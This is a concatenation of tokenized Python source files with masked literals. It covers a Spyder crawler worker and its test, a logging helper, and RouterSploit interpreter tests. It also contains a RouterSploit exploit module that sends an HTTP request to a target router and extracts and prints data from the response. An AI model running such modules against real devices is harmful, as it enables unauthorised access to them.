zmq_logging_handler = PUBHandler ( log_pub ) <EOL> zmq_logging_handler . root_topic = "<STR_LIT>" <EOL> logger = logging . getLogger ( ) <EOL> logger . addHandler ( zmq_logging_handler ) <EOL> logger . setLevel ( settings . LOG_LEVEL_WORKER ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> mgmt = create_worker_management ( settings , ctx , io_loop ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> fetcher = create_worker_fetcher ( settings , mgmt , ctx , zmq_logging_handler , <EOL> io_loop ) <EOL> fetcher . start ( ) <EOL> extractor = create_worker_extractor ( settings , mgmt , ctx , <EOL> zmq_logging_handler , io_loop ) <EOL> extractor . start ( ) <EOL> def quit_worker ( raw_msg ) : <EOL> """<STR_LIT>""" <EOL> msg = MgmtMessage ( raw_msg ) <EOL> if ZMQ_SPYDER_MGMT_WORKER_QUIT == msg . data : <EOL> logger . info ( "<STR_LIT>" ) <EOL> DelayedCallback ( io_loop . stop , <NUM_LIT> , io_loop ) . start ( ) <EOL> ack = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , identity = identity , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK ) <EOL> mgmt . _out_stream . send_multipart ( ack . serialize ( ) ) <EOL> mgmt . add_callback ( ZMQ_SPYDER_MGMT_WORKER , quit_worker ) <EOL> mgmt . start ( ) <EOL> msg = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , identity = identity , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_AVAIL ) <EOL> mgmt . _out_stream . send_multipart ( msg . serialize ( ) ) <EOL> def handle_shutdown_signal ( _sig , _frame ) : <EOL> """<STR_LIT>""" <EOL> msg = MgmtMessage ( data = ZMQ_SPYDER_MGMT_WORKER_QUIT ) <EOL> quit_worker ( msg . serialize ( ) ) <EOL> io_loop . start ( ) <EOL> signal . signal ( signal . SIGINT , handle_shutdown_signal ) <EOL> signal . signal ( signal . SIGTERM , handle_shutdown_signal ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> try : <EOL> io_loop . start ( ) <EOL> except ZMQError : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> logger . debug ( traceback . format_exc ( ) ) <EOL> for mod in [ fetcher , extractor , mgmt ] : <EOL> mod . close ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> ctx . term ( ) </s>
<s> import unittest <EOL> import time <EOL> import zmq <EOL> from zmq . eventloop . ioloop import IOLoop <EOL> from zmq . eventloop . zmqstream import ZMQStream <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT <EOL> from spyder . core . constants import ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK <EOL> from spyder . core . messages import MgmtMessage <EOL> from spyder . core . settings import Settings <EOL> from spyder . processor import limiter <EOL> from spyder import workerprocess <EOL> class WorkerProcessTestCase ( unittest . TestCase ) : <EOL> def test_that_creating_mgmt_works ( self ) : <EOL> ctx = zmq . Context ( ) <EOL> io_loop = IOLoop . instance ( ) <EOL> def stop_looping ( _msg ) : <EOL> io_loop . stop ( ) <EOL> settings = Settings ( ) <EOL> settings . ZEROMQ_MASTER_PUSH = '<STR_LIT>' <EOL> settings . ZEROMQ_WORKER_PROC_FETCHER_PULL = settings . ZEROMQ_MASTER_PUSH <EOL> settings . ZEROMQ_MASTER_SUB = '<STR_LIT>' <EOL> settings . ZEROMQ_WORKER_PROC_EXTRACTOR_PUB = settings . ZEROMQ_MASTER_SUB <EOL> settings . ZEROMQ_MGMT_MASTER = '<STR_LIT>' <EOL> settings . ZEROMQ_MGMT_WORKER = '<STR_LIT>' <EOL> pubsocket = ctx . socket ( zmq . PUB ) <EOL> pubsocket . bind ( settings . ZEROMQ_MGMT_MASTER ) <EOL> pub_stream = ZMQStream ( pubsocket , io_loop ) <EOL> subsocket = ctx . socket ( zmq . SUB ) <EOL> subsocket . setsockopt ( zmq . SUBSCRIBE , "<STR_LIT>" ) <EOL> subsocket . bind ( settings . ZEROMQ_MGMT_WORKER ) <EOL> sub_stream = ZMQStream ( subsocket , io_loop ) <EOL> mgmt = workerprocess . create_worker_management ( settings , ctx , io_loop ) <EOL> mgmt . add_callback ( ZMQ_SPYDER_MGMT_WORKER , stop_looping ) <EOL> mgmt . start ( ) <EOL> def assert_quit_message ( msg ) : <EOL> self . assertEqual ( ZMQ_SPYDER_MGMT_WORKER_QUIT_ACK , msg . data ) <EOL> sub_stream . on_recv ( assert_quit_message ) <EOL> death = MgmtMessage ( topic = ZMQ_SPYDER_MGMT_WORKER , <EOL> data = ZMQ_SPYDER_MGMT_WORKER_QUIT ) <EOL> pub_stream . send_multipart ( death . serialize ( ) ) <EOL> io_loop . start ( ) <EOL> mgmt . _out_stream . close ( ) <EOL> mgmt . _in_stream . close ( ) <EOL> mgmt . _publisher . close ( ) <EOL> mgmt . _subscriber . close ( ) <EOL> pub_stream . close ( ) <EOL> pubsocket . close ( ) <EOL> sub_stream . close ( ) <EOL> subsocket . close ( ) <EOL> ctx . term ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import ( <EOL> absolute_import , division , print_function , with_statement , <EOL> unicode_literals ) <EOL> import logging <EOL> import sys <EOL> from json import JSONEncoder <EOL> from builtins import * <EOL> module_hdlr = logging . StreamHandler ( sys . stdout ) <EOL> module_logger = logging . getLogger ( __name__ ) <EOL> module_logger . addHandler ( module_hdlr ) <EOL> class CustomEncoder ( JSONEncoder ) : <EOL> """<STR_LIT>""" <EOL> def default ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( obj , '<STR_LIT>' ) : <EOL> encoded = float ( obj ) <EOL> elif hasattr ( obj , '<STR_LIT>' ) : <EOL> encoded = tuple ( obj ) <EOL> elif set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . intersection ( dir ( obj ) ) : <EOL> encoded = list ( obj ) <EOL> else : <EOL> encoded = str ( obj ) <EOL> return encoded <EOL> class StructuredMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ '<STR_LIT:message>' ] = message <EOL> self . kwargs = kwargs <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return str ( CustomEncoder ( ) . encode ( self . kwargs ) ) <EOL> class StructuredAdapter ( logging . LoggerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def process ( self , msg , kwargs ) : <EOL> """<STR_LIT>""" <EOL> extra = kwargs . get ( '<STR_LIT>' , { } ) <EOL> extra . update ( self . extra ) <EOL> kwargs [ '<STR_LIT>' ] = extra <EOL> return str ( StructuredMessage ( msg , ** extra ) ) , kwargs <EOL> class LogFilter ( logging . Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , level ) : <EOL> """<STR_LIT>""" <EOL> self . high_level = level <EOL> def filter ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return record . levelno < self . high_level <EOL> def get_structured_filter ( name = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> class StructuredFilter ( logging . Filter ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , record ) : <EOL> """<STR_LIT>""" <EOL> for k , v in kwargs . items ( ) : <EOL> setattr ( record , k , v ) <EOL> return True <EOL> return StructuredFilter ( name ) </s>
<s> import re <EOL> from routersploit import ( <EOL> exploits , <EOL> sanitize_url , <EOL> print_error , <EOL> print_success , <EOL> print_table , <EOL> http_request , <EOL> mute , <EOL> ) <EOL> class Exploit ( exploits . Exploit ) : <EOL> """<STR_LIT>""" <EOL> __info__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> target = exploits . Option ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> port = exploits . Option ( <NUM_LIT> , '<STR_LIT>' ) <EOL> def run ( self ) : <EOL> url = sanitize_url ( "<STR_LIT>" . format ( self . target , self . port ) ) <EOL> response = http_request ( method = "<STR_LIT:GET>" , url = url ) <EOL> if response is None : <EOL> return <EOL> val = re . findall ( '<STR_LIT>' , response . text ) <EOL> if len ( val ) : <EOL> print_success ( "<STR_LIT>" ) <EOL> data = [ ( '<STR_LIT>' , val [ <NUM_LIT:0> ] ) ] <EOL> headers = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> print_table ( headers , * data ) <EOL> else : <EOL> print_error ( "<STR_LIT>" ) <EOL> @ mute <EOL> def check ( self ) : <EOL> url = sanitize_url ( "<STR_LIT>" . format ( self . target , self . port ) ) <EOL> response = http_request ( method = "<STR_LIT:GET>" , url = url ) <EOL> if response is None : <EOL> return False <EOL> val = re . findall ( '<STR_LIT>' , response . text ) <EOL> if len ( val ) : <EOL> return True <EOL> return False </s>
<s> from __future__ import print_function <EOL> import unittest <EOL> import os <EOL> import inspect <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from routersploit . interpreter import RoutersploitInterpreter <EOL> from routersploit . exploits import Exploit <EOL> class TestExploit ( Exploit ) : <EOL> pass <EOL> class RoutersploitInterpreterTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> RoutersploitInterpreter . setup = mock . Mock ( ) <EOL> self . interpreter = RoutersploitInterpreter ( ) <EOL> self . interpreter . current_module = mock . MagicMock ( ) <EOL> self . raw_prompt_default = "<STR_LIT>" <EOL> self . module_prompt_default = lambda x : "<STR_LIT>" . format ( x ) <EOL> def prepare_prompt_env_variables ( self , raw_prompt = None , module_prompt = None ) : <EOL> if raw_prompt : <EOL> os . environ [ "<STR_LIT>" ] = raw_prompt <EOL> else : <EOL> try : <EOL> os . environ [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> pass <EOL> if module_prompt : <EOL> os . environ [ "<STR_LIT>" ] = module_prompt <EOL> else : <EOL> try : <EOL> del os . environ [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> pass <EOL> getattr ( self . interpreter , '<STR_LIT>' . format ( self . interpreter . __class__ . __name__ ) ) ( ) <EOL> def assertIsDecorated ( self , function , decorator_name ) : <EOL> try : <EOL> decorator_list = function . __decorators__ <EOL> except AttributeError : <EOL> decorator_list = [ ] <EOL> self . assertIn ( <EOL> decorator_name , <EOL> decorator_list , <EOL> msg = "<STR_LIT>" . format ( function . __name__ ) <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_set ( self , mock_print_success ) : <EOL> rhost , new_rhost_value = '<STR_LIT>' , "<STR_LIT>" <EOL> port , new_port_value = '<STR_LIT>' , "<STR_LIT>" <EOL> self . interpreter . current_module . options = [ '<STR_LIT>' , '<STR_LIT:port>' ] <EOL> self . interpreter . current_module . rhost = rhost <EOL> self . interpreter . current_module . port = port <EOL> self . assertEqual ( self . interpreter . current_module . rhost , rhost ) <EOL> self . assertEqual ( self . interpreter . current_module . port , port ) <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( new_rhost_value ) ) <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( new_port_value ) ) <EOL> self . assertEqual ( self . interpreter . current_module . rhost , new_rhost_value ) <EOL> self . assertEqual ( self . interpreter . current_module . port , new_port_value ) <EOL> self . assertEqual ( <EOL> mock_print_success . mock_calls , <EOL> [ mock . call ( { '<STR_LIT>' : new_rhost_value } ) , mock . call ( { '<STR_LIT:port>' : new_port_value } ) ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_set_unknown_option ( self , mock_print_error ) : <EOL> unknown_option = "<STR_LIT>" <EOL> del self . interpreter . current_module . unknown <EOL> known_options = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . interpreter . current_module . options = known_options <EOL> self . interpreter . command_set ( '<STR_LIT>' . format ( unknown_option ) ) <EOL> self . assertEqual ( <EOL> mock_print_error . mock_calls , <EOL> [ mock . call ( "<STR_LIT>" . format ( unknown_option , known_options ) ) ] <EOL> ) <EOL> def test_command_run ( self ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_run : <EOL> self . interpreter . command_run ( ) <EOL> mock_run . assert_called_once_with ( ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_vulnerable ( self , mock_print_success ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = True <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> mock_print_success . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_not_vulnerable ( self , print_error ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = False <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_error . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_could_not_be_verified_1 ( self , print_status ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = "<STR_LIT>" <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_status . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_check_target_could_not_be_verified_2 ( self , print_status ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_check : <EOL> mock_check . return_value = None <EOL> self . interpreter . command_check ( ) <EOL> mock_check . assert_called_once_with ( ) <EOL> print_status . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_run_exception_during_exploit_execution ( self , mock_print_error , mock_format_exc , mock_exc_info ) : <EOL> with mock . patch . object ( self . interpreter . current_module , '<STR_LIT>' ) as mock_run : <EOL> mock_run . side_effect = RuntimeError <EOL> mock_format_exc . return_value = stacktrace = "<STR_LIT>" <EOL> mock_exc_info . return_value = info = "<STR_LIT:info>" <EOL> self . interpreter . command_run ( ) <EOL> mock_run . assert_called_once_with ( ) <EOL> mock_format_exc . assert_called_once_with ( info ) <EOL> mock_print_error . assert_called_once_with ( stacktrace ) <EOL> def test_command_back ( self ) : <EOL> self . assertIsNotNone ( self . interpreter . current_module ) <EOL> self . interpreter . command_back ( ) <EOL> self . assertIsNone ( self . interpreter . current_module ) <EOL> def test_custom_raw_prompt ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( "<STR_LIT>" , self . interpreter . prompt ) <EOL> def test_default_raw_prompt_no_env_variable ( self ) : <EOL> self . prepare_prompt_env_variables ( ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( self . raw_prompt_default , self . interpreter . prompt ) <EOL> def test_default_raw_prompt_wrong_env_variable_format ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( self . raw_prompt_default , self . interpreter . prompt ) <EOL> def test_custom_module_ ( self ) : <EOL> self . prepare_prompt_env_variables ( module_prompt = "<STR_LIT>" ) <EOL> module_name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : module_name } <EOL> self . assertEqual ( "<STR_LIT>" . format ( module_name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_no_env_variable ( self ) : <EOL> self . prepare_prompt_env_variables ( ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_wrong_env_variable_format_1 ( self ) : <EOL> self . prepare_prompt_env_variables ( raw_prompt = "<STR_LIT>" ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_default_module_prompt_wrong_env_variable_format_2 ( self ) : <EOL> self . prepare_prompt_env_variables ( module_prompt = "<STR_LIT>" ) <EOL> name = "<STR_LIT>" <EOL> self . interpreter . current_module . _MagicMock__info__ = { '<STR_LIT:name>' : name } <EOL> self . assertEqual ( self . module_prompt_default ( name ) , self . interpreter . prompt ) <EOL> def test_module_prompt_module_has_no_metadata ( self ) : <EOL> del self . interpreter . current_module . _MagicMock__info__ <EOL> self . assertEqual ( self . module_prompt_default ( '<STR_LIT>' ) , self . interpreter . prompt ) <EOL> def test_module_prompt_module_has_no_name_key_in_metadata ( self ) : <EOL> self . interpreter . current_module . _MagicMock__info__ = { } <EOL> self . assertEqual ( self . module_prompt_default ( '<STR_LIT>' ) , self . interpreter . prompt ) <EOL> def test_suggested_commands_with_loaded_module ( self ) : <EOL> self . assertEqual ( <EOL> self . interpreter . suggested_commands ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_suggested_commands_without_loaded_module ( self ) : <EOL> self . interpreter . current_module = None <EOL> self . assertEqual ( <EOL> self . interpreter . suggested_commands ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_01 ( self , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> exploit_class = mock . MagicMock ( name = "<STR_LIT>" ) <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> mocked_module . Exploit = exploit_class <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . interpreter . current_module , exploit_class ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_02 ( self , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> exploit_class = mock . MagicMock ( name = "<STR_LIT>" ) <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> mocked_module . Exploit = exploit_class <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . interpreter . current_module , exploit_class ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_unknown_module ( self , mocked_print_error , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ '<STR_LIT>' ] <EOL> module_path = "<STR_LIT>" <EOL> mocked_import_module . side_effect = ImportError <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> mocked_print_error . assert_called_once_with ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( self . interpreter . current_module , None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_use_unknown_extension ( self , mocked_print_error , mocked_import_module ) : <EOL> """<STR_LIT>""" <EOL> module_path = "<STR_LIT>" <EOL> self . interpreter . current_module = None <EOL> self . interpreter . modules = [ module_path , '<STR_LIT>' ] <EOL> mocked_import_module . return_value = mocked_module = mock . MagicMock ( name = '<STR_LIT>' ) <EOL> del mocked_module . Exploit <EOL> self . interpreter . command_use ( module_path ) <EOL> mocked_import_module . assert_called_once_with ( '<STR_LIT>' ) <EOL> mocked_print_error . assert_called_once_with ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( self . interpreter . current_module , None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_info ( self , mock_print ) : <EOL> metadata = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> description = "<STR_LIT>" <EOL> self . interpreter . current_module . __doc__ = description <EOL> self . interpreter . current_module . _MagicMock__info__ = metadata <EOL> self . interpreter . command_show ( '<STR_LIT:info>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_info_module_with_no_metadata ( self , mock_print ) : <EOL> metadata = { } <EOL> description = "<STR_LIT>" <EOL> self . interpreter . current_module . __doc__ = description <EOL> self . interpreter . current_module . _MagicMock__info__ = metadata <EOL> self . interpreter . command_show ( '<STR_LIT:info>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( ) ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_options ( self , mock_print ) : <EOL> exploit_attributes = { <EOL> '<STR_LIT:target>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> '<STR_LIT:foo>' : '<STR_LIT>' , <EOL> '<STR_LIT:bar>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . interpreter . current_module . options = [ '<STR_LIT:target>' , '<STR_LIT:port>' , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ] <EOL> self . interpreter . current_module . exploit_attributes . __getitem__ . side_effect = lambda key : exploit_attributes [ key ] <EOL> self . interpreter . current_module . foo = <NUM_LIT:1> <EOL> self . interpreter . current_module . bar = <NUM_LIT:2> <EOL> self . interpreter . current_module . baz = <NUM_LIT:3> <EOL> self . interpreter . current_module . target = '<STR_LIT:127.0.0.1>' <EOL> self . interpreter . current_module . port = <NUM_LIT> <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( ) , <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_options_when_there_is_no_module_opts ( self , mock_print ) : <EOL> exploit_attributes = { <EOL> '<STR_LIT:target>' : '<STR_LIT>' , <EOL> '<STR_LIT:port>' : '<STR_LIT>' , <EOL> } <EOL> self . interpreter . current_module . options = [ '<STR_LIT:target>' , '<STR_LIT:port>' ] <EOL> self . interpreter . current_module . exploit_attributes . __getitem__ . side_effect = lambda key : exploit_attributes [ key ] <EOL> self . interpreter . current_module . target = '<STR_LIT:127.0.0.1>' <EOL> self . interpreter . current_module . port = <NUM_LIT> <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( ) , <EOL> mock . call ( ) , <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_command_show_unknown_sub_command ( self , mock_print ) : <EOL> help_text = "<STR_LIT>" <EOL> self . interpreter . command_show ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> mock_print . mock_calls , <EOL> [ mock . call ( help_text ) ] <EOL> ) <EOL> def test_if_command_run_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_run , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_set_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_set , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_show_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_show , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_if_command_check_has_module_required_decorator ( self ) : <EOL> self . assertIsDecorated ( <EOL> self . interpreter . command_check , <EOL> "<STR_LIT>" <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_load_modules ( self , mock_getmembers , mock_import_module , mock_walk ) : <EOL> mock_walk . return_value = ( <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ) <EOL> mock_import_module . side_effect = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> mock_getmembers . side_effect = [ <EOL> [ ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) , ( '<STR_LIT>' , TestExploit ) ] , <EOL> [ ] , <EOL> [ ( "<STR_LIT>" , TestExploit ) , ( '<STR_LIT>' , mock . MagicMock ) ] <EOL> ] <EOL> self . interpreter . load_modules ( ) <EOL> mock_walk . assert_called_once_with ( self . interpreter . modules_directory ) <EOL> self . assertEqual ( <EOL> mock_import_module . mock_calls , <EOL> [ <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> mock_getmembers . mock_calls , <EOL> [ <EOL> mock . call ( <NUM_LIT:1> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:2> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:3> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:4> , inspect . isclass ) , <EOL> mock . call ( <NUM_LIT:5> , inspect . isclass ) , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> self . interpreter . modules , <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_load_modules_import_error ( self , mock_getmembers , mock_import_module , mock_walk ) : <EOL> mock_walk . return_value = ( <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ) <EOL> import_error = ImportError ( "<STR_LIT>" ) <EOL> mock_import_module . side_effect = [ <NUM_LIT:1> , <NUM_LIT:2> , import_error , <NUM_LIT:4> , <NUM_LIT:5> , import_error ] 